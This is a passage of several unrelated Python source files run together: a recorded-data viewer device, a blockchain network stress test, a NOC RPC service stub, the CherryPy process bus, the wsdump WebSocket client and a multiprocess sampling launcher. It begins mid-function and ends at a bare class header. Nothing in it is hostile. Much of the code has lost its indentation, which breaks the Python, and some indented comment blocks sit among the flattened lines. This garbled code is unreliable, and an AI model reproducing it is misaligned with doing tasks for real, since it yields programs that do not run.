"""
args = {'start': start, 'stop': stop, 'units': units}
if callback is None:
return self._parent()._post_block('statistics_get', self, args)
else:
self._parent()._post('statistics_get', self, args, callback)
return
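    # Usage sketch (illustrative only): pass a callback to keep the caller's
    # thread unblocked; the callback receives the statistics structure on the
    # view thread instead of the result being returned.
    #
    #     view.statistics_get(0.0, 1.0, units='seconds',
    #                         callback=lambda stats: print(stats))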
def statistics_get_multiple(self, ranges, units=None, callback=None, source_id=None):
args = {'ranges': ranges, 'units': units, 'source_id': source_id}
if callback is None:
return self._parent()._post_block('statistics_get_multiple', self, args)
else:
self._parent()._post('statistics_get_multiple', self, args, callback)
return
def ping(self, *args, **kwargs):
return self._parent()._post_block('ping', self, (args, kwargs))
class RecordingViewerDevice:
"""A user-interface-compatible device that displays previous recorded data
:param filename: The filename path to the pre-recorded data.
"""
def __init__(self, filename, current_ranging_format=None):
if isinstance(filename, str) and not os.path.isfile(filename):
raise IOError('file not found')
self._filename = filename
self._current_ranging_format = current_ranging_format
self._reader = None
self._views = []
self._coalesce = {}
self._thread = None
self._cmd_queue = queue.Queue() # tuples of (command, args, callback)
self._response_queue = queue.Queue()
self._quit = False
self._log = logging.getLogger(__name__)
def __str__(self):
return os.path.basename(self._filename)
@property
def filename(self):
return self._filename
@property
def sampling_frequency(self):
if self._reader is None:
return None
return self._reader.sampling_frequency
@property
def calibration(self):
if self._reader is None:
return None
return self._reader.calibration
@property
def voltage_range(self):
return self._reader.voltage_range
def _cmd_process(self, cmd, view, args, cbk):
rv = None
try:
# self._log.debug('_cmd_process %s - start', cmd)
if cmd == 'refresh':
view._refresh_requested = True
elif cmd == 'on_x_change':
rv = view._on_x_change(*args)
elif cmd == 'samples_get':
rv = view._samples_get(**args)
elif cmd == 'statistics_get':
rv = view._statistics_get(**args)
elif cmd == 'statistics_get_multiple':
rv = view._statistics_get_multiple(**args)
elif cmd == 'view_factory':
self._views.append(args)
rv = args
elif cmd == 'view_close':
if args in self._views:
self._views.remove(args)
elif cmd == 'open':
rv = self._open()
elif cmd == 'close':
rv = self._close()
elif cmd == 'ping':
rv = args
else:
self._log.warning('unsupported command %s', cmd)
        except Exception:
            self._log.exception('While running command %s', cmd)
if callable(cbk):
try:
cbk(rv)
            except Exception:
                self._log.exception('in callback')
def run(self):
cmd_count = 0
timeout = 1.0
self._log.info('RecordingViewerDevice.start')
while not self._quit:
try:
cmd, view, args, cbk = self._cmd_queue.get(timeout=timeout)
except queue.Empty:
timeout = 1.0
for value in self._coalesce.values():
self._cmd_process(*value)
self._coalesce.clear()
for view in self._views:
if view._refresh_requested:
view._update()
cmd_count = 0
continue
cmd_count += 1
timeout = 0.0
try:
source_id = args.pop('source_id')
            except (AttributeError, KeyError, TypeError):  # args may be a tuple or lack a source_id
source_id = None
if source_id is not None:
key = f'{view}_{cmd}_{source_id}' # keep most recent only
self._coalesce[key] = (cmd, view, args, cbk)
else:
self._cmd_process(cmd, view, args, cbk)
self._log.info('RecordingViewerDevice.run done')
def _post(self, command, view=None, args=None, cbk=None):
if self._thread is None:
self._log.info('RecordingViewerDevice._post(%s) when thread not running', command)
else:
self._cmd_queue.put((command, view, args, cbk))
def _post_block(self, command, view=None, args=None, timeout=None):
timeout = TIMEOUT if timeout is None else float(timeout)
# self._log.debug('_post_block %s start', command)
while not self._response_queue.empty():
self._log.warning('response queue not empty')
try:
self._response_queue.get(timeout=0.0)
except queue.Empty:
pass
if self._thread is None:
raise IOError('View thread not running')
self._post(command, view, args, lambda rv_=None: self._response_queue.put(rv_))
try:
rv = self._response_queue.get(timeout=timeout)
except queue.Empty as ex:
self._log.error('RecordingViewerDevice thread hung: %s - FORCE CLOSE', command)
self._post('close', None, None)
self._thread.join(timeout=TIMEOUT)
self._thread = None
rv = ex
except Exception as ex:
rv = ex
if isinstance(rv, Exception):
raise IOError(rv)
# self._log.debug('_post_block %s done', command) # rv
return rv
def _open(self):
self._reader = DataReader()
if self._current_ranging_format is not None:
self._reader.raw_processor.suppress_mode = self._current_ranging_format
self._reader.open(self._filename) # todo progress bar updates
self._log.info('RecordingViewerDevice.open')
def _close(self):
if self._reader is not None:
self._reader.close()
self._reader = None
self._quit = True
def view_factory(self):
view = RecordingView(self)
return self._post_block('view_factory', None, view)
def open(self, event_callback_fn=None):
self.close()
self._log.info('open')
self._thread = threading.Thread(name='view', target=self.run)
self._thread.start()
self._post_block('open')
def close(self):
if self._thread is not None:
self._log.info('close')
try:
self._post_block('close')
except Exception:
self._log.exception('while attempting to close')
self._thread.join(timeout=TIMEOUT)
self._thread = None
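# Minimal lifecycle sketch (illustrative; 'capture.jls' is a hypothetical
# filename): the device owns a worker thread, and every view call is proxied
# through the command queue onto that thread.
#
#     device = RecordingViewerDevice('capture.jls')
#     device.open()                 # start the view thread, open the reader
#     view = device.view_factory()  # RecordingView registered on the thread
#     stats = view.statistics_get(0.0, 1.0, units='seconds')  # blocks
#     device.close()                # stop the thread, close the reader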
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
    def _transfer(self, node, acc1, acc2, amount, threadId, round_num):
        memo = "%d %d" % (threadId, round_num)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, aacio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, aacio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, aacio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="aacio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission aacio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
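        # Worked example of the pacing arithmetic, assuming speeds[cmdInd]=500,
        # sec=10, maxthreads=100: total=5000, nthreads=100, cycle=50 rounds of
        # 100 parallel transfers, delay=0.2 s per round => ~500 transfers/s.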
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
stub.py
|
# ----------------------------------------------------------------------
# Service stub for scripts and commands
# ----------------------------------------------------------------------
# Copyright (C) 2007-2020 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import logging
import threading
from collections import defaultdict
import asyncio
from typing import Optional, Dict
# NOC modules
from noc.core.dcs.loader import get_dcs, DEFAULT_DCS
from noc.config import config
from noc.core.liftbridge.base import LiftBridgeClient
from noc.core.ioloop.util import run_sync
from .rpc import RPCProxy
class ServiceStub(object):
name = "stub"
pooled = False
def __init__(self):
self.logger = logging.getLogger("stub")
self.is_ready = threading.Event()
self.config = None
self._metrics = defaultdict(list)
self.loop: Optional[asyncio.BaseEventLoop] = None
def start(self):
t = threading.Thread(target=self._start)
        t.daemon = True
t.start()
self.is_ready.wait()
    def _start(self):
        # a worker thread has no running event loop; create and install one
        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.loop)
# Initialize DCS
self.dcs = get_dcs(DEFAULT_DCS)
# Activate service
self.logger.warning("Activating stub service")
self.logger.warning("Starting IOLoop")
self.loop.call_soon(self.is_ready.set)
self.loop.run_forever()
def get_event_loop(self) -> asyncio.BaseEventLoop:
return self.loop
def open_rpc(self, name, pool=None, sync=False, hints=None):
"""
Returns RPC proxy object.
"""
if pool:
svc = "%s-%s" % (name, pool)
else:
svc = name
return RPCProxy(self, svc, sync=sync, hints=hints)
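    # Usage sketch (illustrative; 'sae' stands in for any service name):
    #
    #     stub = ServiceStub()
    #     stub.start()                        # spin up the IOLoop thread
    #     proxy = stub.open_rpc('sae', sync=True)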
def iter_rpc_retry_timeout(self):
"""
Yield timeout to wait after unsuccessful RPC connection
"""
for t in config.rpc.retry_timeout.split(","):
yield float(t)
def register_metrics(self, table, data):
self._metrics[table] += data
def publish(
self,
value: bytes,
stream: str,
partition: Optional[int] = None,
key: Optional[bytes] = None,
headers: Optional[Dict[str, bytes]] = None,
):
async def wrap():
async with LiftBridgeClient() as client:
await client.publish(
value=value,
stream=stream,
partition=partition,
key=key,
headers=headers,
auto_compress=bool(config.liftbridge.compression_method),
)
run_sync(wrap)
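    # Note on the pattern above (publish): a coroutine closure is handed to
    # run_sync(), which drives it to completion on an event loop so that
    # synchronous callers can invoke async client code. The same
    # wrap-and-run_sync idiom can be reused for other one-shot async calls.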
|
wspbus.py
|
r"""An implementation of the Web Site Process Bus.
This module is completely standalone, depending only on the stdlib.
Web Site Process Bus
--------------------
A Bus object is used to contain and manage site-wide behavior:
daemonization, HTTP server start/stop, process reload, signal handling,
drop privileges, PID file management, logging for all of these,
and many more.
In addition, a Bus object provides a place for each web framework
to register code that runs in response to site-wide events (like
process start and stop), or which controls or otherwise interacts with
the site-wide components mentioned above. For example, a framework which
uses file-based templates would add known template filenames to an
autoreload component.
Ideally, a Bus object will be flexible enough to be useful in a variety
of invocation scenarios:
1. The deployer starts a site from the command line via a
framework-neutral deployment script; applications from multiple frameworks
are mixed in a single site. Command-line arguments and configuration
files are used to define site-wide components such as the HTTP server,
WSGI component graph, autoreload behavior, signal handling, etc.
2. The deployer starts a site via some other process, such as Apache;
applications from multiple frameworks are mixed in a single site.
Autoreload and signal handling (from Python at least) are disabled.
3. The deployer starts a site via a framework-specific mechanism;
for example, when running tests, exploring tutorials, or deploying
single applications from a single framework. The framework controls
which site-wide components are enabled as it sees fit.
The Bus object in this package uses topic-based publish-subscribe
messaging to accomplish all this. A few topic channels are built in
('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and
site containers are free to define their own. If a message is sent to a
channel that has not been defined or has no listeners, there is no effect.
In general, there should only ever be a single Bus object per process.
Frameworks and site containers share a single Bus object by publishing
messages and subscribing listeners.
The Bus object works as a finite state machine which models the current
state of the process. Bus methods move it from one state to another;
those methods then publish to subscribed listeners on the channel for
the new state.::
O
|
V
STOPPING --> STOPPED --> EXITING -> X
A A |
| \___ |
| \ |
| V V
STARTED <-- STARTING
"""
import atexit
try:
    import ctypes
except ImportError:
    """Google AppEngine is shipped without ctypes
    :seealso: http://stackoverflow.com/a/6523777/70170
    """
    ctypes = None
import operator
import os
import sys
import threading
import time
import traceback as _traceback
import warnings
import subprocess
import functools
import six
# Here I save the value of os.getcwd(), which, if I am imported early enough,
# will be the directory from which the startup script was run. This is needed
# by _do_execv(), to change back to the original directory before execv()ing a
# new process. This is a defense against the application having changed the
# current working directory (which could make sys.executable "not found" if
# sys.executable is a relative-path, and/or cause other problems).
_startup_cwd = os.getcwd()
class ChannelFailures(Exception):
"""Exception raised during errors on Bus.publish()."""
delimiter = '\n'
def __init__(self, *args, **kwargs):
"""Initialize ChannelFailures errors wrapper."""
super(ChannelFailures, self).__init__(*args, **kwargs)
self._exceptions = list()
def handle_exception(self):
"""Append the current exception to self."""
self._exceptions.append(sys.exc_info()[1])
def get_instances(self):
"""Return a list of seen exception instances."""
return self._exceptions[:]
def __str__(self):
"""Render the list of errors, which happened in channel."""
exception_strings = map(repr, self.get_instances())
return self.delimiter.join(exception_strings)
__repr__ = __str__
def __bool__(self):
"""Determine whether any error happened in channel."""
return bool(self._exceptions)
__nonzero__ = __bool__
# Use a flag to indicate the state of the bus.
class _StateEnum(object):
class State(object):
name = None
def __repr__(self):
return 'states.%s' % self.name
def __setattr__(self, key, value):
if isinstance(value, self.State):
value.name = key
object.__setattr__(self, key, value)
states = _StateEnum()
states.STOPPED = states.State()
states.STARTING = states.State()
states.STARTED = states.State()
states.STOPPING = states.State()
states.EXITING = states.State()
try:
import fcntl
except ImportError:
max_files = 0
else:
try:
max_files = os.sysconf('SC_OPEN_MAX')
except AttributeError:
max_files = 1024
class Bus(object):
"""Process state-machine and messenger for HTTP site deployment.
All listeners for a given channel are guaranteed to be called even
if others at the same channel fail. Each failure is logged, but
execution proceeds on to the next listener. The only way to stop all
processing from inside a listener is to raise SystemExit and stop the
whole server.
"""
states = states
state = states.STOPPED
execv = False
max_cloexec_files = max_files
def __init__(self):
"""Initialize pub/sub bus."""
self.execv = False
self.state = states.STOPPED
channels = 'start', 'stop', 'exit', 'graceful', 'log', 'main'
self.listeners = dict(
(channel, set())
for channel in channels
)
self._priorities = {}
def subscribe(self, channel, callback=None, priority=None):
"""Add the given callback at the given channel (if not present).
If callback is None, return a partial suitable for decorating
the callback.
"""
if callback is None:
return functools.partial(
self.subscribe,
channel,
priority=priority,
)
ch_listeners = self.listeners.setdefault(channel, set())
ch_listeners.add(callback)
if priority is None:
priority = getattr(callback, 'priority', 50)
self._priorities[(channel, callback)] = priority
def unsubscribe(self, channel, callback):
"""Discard the given callback (if present)."""
listeners = self.listeners.get(channel)
if listeners and callback in listeners:
listeners.discard(callback)
del self._priorities[(channel, callback)]
def publish(self, channel, *args, **kwargs):
"""Return output of all subscribers for the given channel."""
if channel not in self.listeners:
return []
exc = ChannelFailures()
output = []
raw_items = (
(self._priorities[(channel, listener)], listener)
for listener in self.listeners[channel]
)
items = sorted(raw_items, key=operator.itemgetter(0))
for priority, listener in items:
try:
output.append(listener(*args, **kwargs))
except KeyboardInterrupt:
raise
except SystemExit:
e = sys.exc_info()[1]
# If we have previous errors ensure the exit code is non-zero
if exc and e.code == 0:
e.code = 1
raise
except Exception:
exc.handle_exception()
if channel == 'log':
# Assume any further messages to 'log' will fail.
pass
else:
self.log('Error in %r listener %r' % (channel, listener),
level=40, traceback=True)
if exc:
raise exc
return output
def _clean_exit(self):
"""Assert that the Bus is not running in atexit handler callback."""
if self.state != states.EXITING:
warnings.warn(
'The main thread is exiting, but the Bus is in the %r state; '
'shutting it down automatically now. You must either call '
'bus.block() after start(), or call bus.exit() before the '
'main thread exits.' % self.state, RuntimeWarning)
self.exit()
def start(self):
"""Start all services."""
atexit.register(self._clean_exit)
self.state = states.STARTING
self.log('Bus STARTING')
try:
self.publish('start')
self.state = states.STARTED
self.log('Bus STARTED')
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.log('Shutting down due to error in start listener:',
level=40, traceback=True)
e_info = sys.exc_info()[1]
try:
self.exit()
except Exception:
# Any stop/exit errors will be logged inside publish().
pass
# Re-raise the original error
raise e_info
def exit(self):
"""Stop all services and prepare to exit the process."""
exitstate = self.state
EX_SOFTWARE = 70
try:
self.stop()
self.state = states.EXITING
self.log('Bus EXITING')
self.publish('exit')
# This isn't strictly necessary, but it's better than seeing
# "Waiting for child threads to terminate..." and then nothing.
self.log('Bus EXITED')
except Exception:
# This method is often called asynchronously (whether thread,
# signal handler, console handler, or atexit handler), so we
# can't just let exceptions propagate out unhandled.
# Assume it's been logged and just die.
os._exit(EX_SOFTWARE)
if exitstate == states.STARTING:
# exit() was called before start() finished, possibly due to
# Ctrl-C because a start listener got stuck. In this case,
# we could get stuck in a loop where Ctrl-C never exits the
            # process, so we just call os._exit here.
os._exit(EX_SOFTWARE)
def restart(self):
"""Restart the process (may close connections).
This method does not restart the process from the calling thread;
instead, it stops the bus and asks the main thread to call execv.
"""
self.execv = True
self.exit()
def graceful(self):
"""Advise all services to reload."""
self.log('Bus graceful')
self.publish('graceful')
def block(self, interval=0.1):
"""Wait for the EXITING state, KeyboardInterrupt or SystemExit.
This function is intended to be called only by the main thread.
After waiting for the EXITING state, it also waits for all threads
to terminate, and then calls os.execv if self.execv is True. This
design allows another thread to call bus.restart, yet have the main
thread perform the actual execv call (required on some platforms).
"""
try:
self.wait(states.EXITING, interval=interval, channel='main')
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.log('Keyboard Interrupt: shutting down bus')
self.exit()
except SystemExit:
self.log('SystemExit raised: shutting down bus')
self.exit()
raise
# Waiting for ALL child threads to finish is necessary on OS X.
# See https://github.com/cherrypy/cherrypy/issues/581.
# It's also good to let them all shut down before allowing
# the main thread to call atexit handlers.
# See https://github.com/cherrypy/cherrypy/issues/751.
self.log('Waiting for child threads to terminate...')
for t in threading.enumerate():
            # Validate that we're not trying to join the MainThread,
            # which would cause a deadlock. This case arises when running
            # as a Windows service, or whenever another thread calls
            # cherrypy.engine.exit()
if (
t != threading.currentThread() and
not isinstance(t, threading._MainThread) and
# Note that any dummy (external) threads are
# always daemonic.
not t.daemon
):
self.log('Waiting for thread %s.' % t.getName())
t.join()
if self.execv:
self._do_execv()
def wait(self, state, interval=0.1, channel=None):
"""Poll for the given state(s) at intervals; publish to channel."""
if isinstance(state, (tuple, list)):
states = state
else:
states = [state]
while self.state not in states:
time.sleep(interval)
self.publish(channel)
def _do_execv(self):
"""Re-execute the current process.
This must be called from the main thread, because certain platforms
(OS X) don't allow execv to be called in a child thread very well.
"""
try:
args = self._get_true_argv()
except NotImplementedError:
"""It's probably win32 or GAE"""
args = [sys.executable] + self._get_interpreter_argv() + sys.argv
self.log('Re-spawning %s' % ' '.join(args))
self._extend_pythonpath(os.environ)
if sys.platform[:4] == 'java':
from _systemrestart import SystemRestart
raise SystemRestart
else:
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
if self.max_cloexec_files:
self._set_cloexec()
os.execv(sys.executable, args)
@staticmethod
def _get_interpreter_argv():
"""Retrieve current Python interpreter's arguments.
Returns empty tuple in case of frozen mode, uses built-in arguments
reproduction function otherwise.
        Frozen mode is possible when the app has been packaged into a binary
        executable using py2exe. In this case the interpreter's arguments are
        already built into that executable.
:seealso: https://github.com/cherrypy/cherrypy/issues/1526
Ref: https://pythonhosted.org/PyInstaller/runtime-information.html
"""
return ([]
if getattr(sys, 'frozen', False)
else subprocess._args_from_interpreter_flags())
@staticmethod
def _get_true_argv():
"""Retrieve all real arguments of the python interpreter.
...even those not listed in ``sys.argv``
:seealso: http://stackoverflow.com/a/28338254/595220
:seealso: http://stackoverflow.com/a/6683222/595220
:seealso: http://stackoverflow.com/a/28414807/595220
"""
try:
char_p = ctypes.c_char_p if six.PY2 else ctypes.c_wchar_p
argv = ctypes.POINTER(char_p)()
argc = ctypes.c_int()
ctypes.pythonapi.Py_GetArgcArgv(
ctypes.byref(argc),
ctypes.byref(argv),
)
_argv = argv[:argc.value]
# The code below is trying to correctly handle special cases.
# `-c`'s argument interpreted by Python itself becomes `-c` as
# well. Same applies to `-m`. This snippet is trying to survive
# at least the case with `-m`
# Ref: https://github.com/cherrypy/cherrypy/issues/1545
# Ref: python/cpython@418baf9
argv_len, is_command, is_module = len(_argv), False, False
try:
m_ind = _argv.index('-m')
if m_ind < argv_len - 1 and _argv[m_ind + 1] in ('-c', '-m'):
"""
In some older Python versions `-m`'s argument may be
substituted with `-c`, not `-m`
"""
is_module = True
except (IndexError, ValueError):
m_ind = None
try:
c_ind = _argv.index('-c')
if c_ind < argv_len - 1 and _argv[c_ind + 1] == '-c':
is_command = True
except (IndexError, ValueError):
c_ind = None
if is_module:
"""It's containing `-m -m` sequence of arguments"""
if is_command and c_ind < m_ind:
"""There's `-c -c` before `-m`"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. Ref: "
'https://github.com/cherrypy/cherrypy/issues/1545')
# Survive module argument here
original_module = sys.argv[0]
if not os.access(original_module, os.R_OK):
"""There's no such module exist"""
raise AttributeError(
"{} doesn't seem to be a module "
'accessible by current user'.format(original_module))
del _argv[m_ind:m_ind + 2] # remove `-m -m`
# ... and substitute it with the original module path:
_argv.insert(m_ind, original_module)
elif is_command:
"""It's containing just `-c -c` sequence of arguments"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. "
'Ref: https://github.com/cherrypy/cherrypy/issues/1545')
except AttributeError:
"""It looks Py_GetArgcArgv is completely absent in some environments
It is known, that there's no Py_GetArgcArgv in MS Windows and
``ctypes`` module is completely absent in Google AppEngine
:seealso: https://github.com/cherrypy/cherrypy/issues/1506
:seealso: https://github.com/cherrypy/cherrypy/issues/1512
:ref: http://bit.ly/2gK6bXK
"""
raise NotImplementedError
else:
return _argv
@staticmethod
def _extend_pythonpath(env):
"""Prepend current working dir to PATH environment variable if needed.
If sys.path[0] is an empty string, the interpreter was likely
invoked with -m and the effective path is about to change on
re-exec. Add the current directory to $PYTHONPATH to ensure
that the new process sees the same path.
This issue cannot be addressed in the general case because
Python cannot reliably reconstruct the
original command line (http://bugs.python.org/issue14208).
(This idea filched from tornado.autoreload)
"""
path_prefix = '.' + os.pathsep
existing_path = env.get('PYTHONPATH', '')
needs_patch = (
sys.path[0] == '' and
not existing_path.startswith(path_prefix)
)
if needs_patch:
env['PYTHONPATH'] = path_prefix + existing_path
def _set_cloexec(self):
"""Set the CLOEXEC flag on all open files (except stdin/out/err).
If self.max_cloexec_files is an integer (the default), then on
platforms which support it, it represents the max open files setting
for the operating system. This function will be called just before
the process is restarted via os.execv() to prevent open files
from persisting into the new process.
Set self.max_cloexec_files to 0 to disable this behavior.
"""
for fd in range(3, self.max_cloexec_files): # skip stdin/out/err
try:
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
except IOError:
continue
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
def stop(self):
"""Stop all services."""
self.state = states.STOPPING
self.log('Bus STOPPING')
self.publish('stop')
self.state = states.STOPPED
self.log('Bus STOPPED')
def start_with_callback(self, func, args=None, kwargs=None):
"""Start 'func' in a new thread T, then start self (and return T)."""
if args is None:
args = ()
if kwargs is None:
kwargs = {}
args = (func,) + args
def _callback(func, *a, **kw):
self.wait(states.STARTED)
func(*a, **kw)
t = threading.Thread(target=_callback, args=args, kwargs=kwargs)
t.setName('Bus Callback ' + t.getName())
t.start()
self.start()
return t
def log(self, msg='', level=20, traceback=False):
"""Log the given message. Append the last traceback if requested."""
if traceback:
msg += '\n' + ''.join(_traceback.format_exception(*sys.exc_info()))
self.publish('log', msg, level)
bus = Bus()
|
wsdump.py
|
#!/usr/bin/env python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
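# Example invocations (illustrative; the echo host matches the help text above):
#
#     wsdump.py ws://echo.websocket.org/ -t "hello"   # send an initial text frame
#     wsdump.py ws://echo.websocket.org/ -v -n        # verbose, skip cert checks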
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
        options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
run_multithread_sampling_iS3D.py
|
import csv
import os
import sys
from multiprocessing import Process, current_process
import datetime as dt
import time
print("### Starting multithread sampling routine ###")
start_time = time.time()
#number of samples
nsamples = int(sys.argv[1])
print("Number of samples : " + str(nsamples) )
#number of cores reading the same freezeout surface
ncores = int(sys.argv[2])
print("Cores available : " + str(ncores) )
def spawn_sampler(sample):
sample_dir = "sample_" + str(sample)
os.system( 'mkdir ' + sample_dir )
os.chdir( sample_dir )
#link necessary input files to current working dir
os.system( 'ln -s ../input input' )
os.system( 'ln -s ../iS3D_parameters.dat iS3D_parameters.dat' )
os.system( 'ln -s ../tables tables' )
os.system( 'ln -s ../deltaf_coefficients deltaf_coefficients' )
os.system( 'ln -s ../PDG PDG' )
os.system( 'ln -s ../iS3D.e iS3D.e' )
#run the sampler
os.system( 'mkdir results' )
os.system( './iS3D.e' )
#return to parent dir
os.chdir( ".." )
num_launches = (nsamples // ncores) + 1  # integer division so range() below gets an int
#spawn the jobs
if __name__ == '__main__':
    for launch in range(0, num_launches):
worker_count = ncores
worker_pool = []
for core in range(worker_count):
sample = launch * ncores + core
p = Process( target = spawn_sampler, args = (sample,) )
p.start()
worker_pool.append(p)
for p in worker_pool:
p.join()
print("Oversampling routine finished in " + str( time.time() - start_time) + " sec")
print("Goodbye!")
|
Mgmt.py
|
"""Mgmt System for PiCN"""
import multiprocessing
import os
import select
import socket
import time
from typing import Dict
from PiCN.Layers.ICNLayer.ContentStore import BaseContentStore
from PiCN.Layers.ICNLayer.ForwardingInformationBase import BaseForwardingInformationBase
from PiCN.Layers.ICNLayer.PendingInterestTable import BasePendingInterestTable
from PiCN.Packets import Content, Name
from PiCN.Processes import LayerProcess
from PiCN.Processes import PiCNProcess
from PiCN.Layers.LinkLayer.Interfaces import AddressInfo, BaseInterface, UDP4Interface
class Mgmt(PiCNProcess):
